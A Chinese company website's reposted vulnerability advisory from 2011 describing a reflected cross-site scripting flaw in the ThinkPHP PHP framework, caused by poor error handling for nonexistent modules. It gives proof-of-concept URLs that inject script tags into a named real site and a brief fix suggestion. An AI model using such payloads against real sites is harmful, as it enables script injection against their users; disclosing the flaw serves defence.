ThinkPHP开发框架xss - 指间世界 - 网站建设,软件开发,泰格软件,百威软件,电脑维修,安防监控

QQ 咨询：361652718 513960520

知识学堂

·联系电话:+86.023-75585550
·联系传真:+86.023-75585550
·24小时手机:13896886023
·QQ 咨询：361652718 513960520

当前位置 > 首页 > 知识学堂 > 网站建设知识

ThinkPHP开发框架xss

更新时间：2011-12-26 | 发布人：本站 | 点击率：511 次

简要描述：开源php开发框架默认存在xss漏洞，导致所有使用该框架开发的系统都存在xss漏洞

详细说明：对不不存在的模块处理错误不当，导致xss漏洞

漏洞证明：

以超级巡警测试

http://i.sucop.com/?m='"><script>alert(3);</script><"&a=login

http://i.sucop.com/index.php?m='"><script>alert(0214559);</script><"&a=help&

http://i.sucop.com/index.php?m='"><script>alert(0214559);</script><"&a=help&

去看看

修复方案：设置好过滤吧~~~

分享到：

QQ空间

新浪微博

开心网

下一篇：OpenEMR 4 多个缺陷及修复
上一篇：SQL server教程:SQL语法

相关文章

欢迎PR>=3的同行网站与我们交换友情链接：

点击这里给我发消息

Copyright 2011 - 2015 www.zjsjwz.com All Rights Reserved
重庆指间世界科技有限公司版权所有电话：023-75585550,13098706767,13896886023
地址：重庆市酉阳县桃花源南路241号
渝ICP备19008661号

渝公网安备 50024202000196号